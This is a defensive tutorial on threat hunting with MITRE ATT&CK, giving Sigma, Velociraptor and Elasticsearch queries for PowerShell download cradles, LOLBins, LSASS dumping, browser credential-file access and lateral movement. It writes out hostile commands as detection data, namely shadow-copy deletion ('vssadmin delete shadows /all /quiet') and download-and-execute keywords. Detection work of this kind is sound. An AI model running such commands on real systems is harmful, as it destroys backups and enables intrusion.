Threat Hunting with MITRE ATT&CK: Find Attackers Before Alarms Fire

by

Traditional security is reactive: wait for an alert, then investigate. Threat hunting flips this model. Instead of waiting for detection systems to fire, threat hunters proactively search for evidence of attackers who are already inside — before any alerts trigger. Studies consistently show that the median attacker dwell time inside a network before discovery is weeks to months. Threat hunting compresses that timeline to hours or days. This guide teaches the methodology and MITRE ATT&CK-based techniques that professional threat hunters use.

The Threat Hunting Mindset

Threat hunting starts with a hypothesis — an assumption about attacker behavior based on threat intelligence. You do not search aimlessly. You form a specific question: “Are there any processes on this network that are spawning cmd.exe from unusual parent processes?” Then you go find evidence to confirm or deny it.

The MITRE ATT&CK framework is your hunting catalog. It documents 14 tactic categories (Initial Access, Execution, Persistence, Privilege Escalation, etc.) and hundreds of specific techniques with detection guidance. Every hunt should map to a specific ATT&CK technique.

MITRE ATT&CK: Your Hunting Map

# Key ATT&CK techniques with the highest ROI for hunting:

# T1059.001 — PowerShell execution (extremely common for attacks)
# Hunt: Look for encoded PowerShell commands (-EncodedCommand flag)
# Windows Event ID 4104 (Script Block Logging) shows the actual code

# T1053.005 — Scheduled Tasks (common persistence mechanism)
# Hunt: Look for scheduled tasks created in the last 7 days

# T1003.001 — LSASS Memory Dump (credential theft)
# Hunt: Look for processes accessing lsass.exe memory

# T1071.001 — Web Protocol C2 (HTTPS-based command and control)
# Hunt: Look for unusual processes making HTTPS connections

# T1055 — Process Injection (attacker code injected into legit processes)
# Hunt: Look for unsigned code running in signed process memory space

Hunt 1: Detecting Living-Off-the-Land Attacks

“Living off the land” means attackers use legitimate Windows tools (PowerShell, WMI, certutil, mshta) to perform malicious actions, blending in with normal administrative activity. These are hard for signature-based tools to catch.

# Hunting with Sigma rules (universal SIEM rule format):
# Install sigma to convert to your SIEM's query language:
pip install sigma-cli

# Example: Detect PowerShell downloading content (T1059.001 + T1105)
# Sigma rule:
title: PowerShell Download Cradle
status: test
logsource:
    product: windows
    service: powershell
detection:
    keywords:
        - 'DownloadString'
        - 'DownloadFile'
        - 'WebClient'
        - 'Invoke-WebRequest'
        - 'IEX'
        - 'Net.WebClient'
condition: keywords
falsepositives:
    - Legitimate admin scripts
level: medium
# Hunting with Velociraptor (ask ALL endpoints simultaneously):

# Hunt: Find encoded PowerShell executions in process command lines
SELECT Pid, Name, CommandLine, CreateTime
FROM pslist()
WHERE CommandLine =~ "-EncodedCommand|-enc\s+[A-Za-z0-9+/=]{50}"

# Hunt: Find LOLBins (Living Off the Land Binaries) executing unusual things
SELECT Pid, Name, CommandLine, Ppid
FROM pslist()
WHERE Name IN ("certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe")
AND CommandLine =~ "http|ftp|download|\.ps1|\.hta|script"

Hunt 2: Credential Access Detection

# LSASS access detection (Mimikatz-style credential dumping)
# Windows Security Event ID 10 (Sysmon) — process access to LSASS

# Wazuh/Sigma rule for LSASS access:
# Event 4656 — handle to an object requested with specific access rights
# Filter for: ObjectName contains "lsass.exe" AND AccessMask = "0x1410"

# Hunt for volume shadow copy deletion (ransomware pre-cursor):
# vssadmin delete shadows /all /quiet
# wmic shadowcopy delete

SELECT CommandLine, CreateTime
FROM pslist()
WHERE CommandLine =~ "vssadmin.*delete|wmic.*shadowcopy.*delete"

# Hunt for credential files being accessed:
SELECT FullPath, Atime, Size
FROM glob(globs=["C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data",
                  "C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\logins.json"])
WHERE Atime > now() - 3600  # accessed in last hour

Hunt 3: Lateral Movement Detection

# Lateral movement via SMB (PsExec / SMB share access):
# Windows Security Event ID 4624 — logon type 3 (network) from internal IPs at unusual hours
# Windows Security Event ID 5140 — network share access

# Hunting internal port scanning (attacker mapping the network):
# Look for a single host making connections to 10+ internal hosts on port 445, 3389, 22
# in a short time window

# Elasticsearch/Wazuh query for this pattern:
# {
#   "query": {
#     "bool": {
#       "must": [
#         {"range": {"@timestamp": {"gte": "now-1h"}}},
#         {"term": {"data.dstport": 445}},
#         {"script": {"script": "doc['data.srcip'].value.startsWith('10.')"}}
#       ]
#     }
#   },
#   "aggs": {
#     "src_hosts": {
#       "terms": {"field": "data.srcip"},
#       "aggs": {
#         "unique_dst": {"cardinality": {"field": "data.dstip"}}
#       }
#     }
#   }
# }
# Flag any source IP contacting 10+ unique destinations in 1 hour

Building a Threat Hunting Program

The Hunt Cycle

  1. Create a hypothesis — based on threat intel, ATT&CK, or observed anomalies in your environment
  2. Define the data sources needed — what logs do you need? Process logs, network flows, EDR telemetry?
  3. Execute the hunt — query your SIEM or EDR, examine results, look for outliers
  4. Document findings — even negative results are valuable (confirms your environment does not exhibit this behavior)
  5. Automate successful hunts — if a hunt finds something, turn it into a detection rule so future instances alert automatically

Essential Data Sources to Enable

  • Sysmon — enhanced Windows event logging. Process creation with hashes (Event 1), network connections (Event 3), file creation (Event 11), registry changes (Events 12-14)
  • PowerShell Script Block Logging — enables Event 4104, captures all PowerShell code executed even if obfuscated
  • Command Line Auditing — enables full command line in Event 4688 (Process Creation)
  • DNS logging — every DNS query from every host. Reveals C2 domains, data exfiltration, DGA patterns
  • Firewall/NetFlow logs — who talked to whom, when, how much data transferred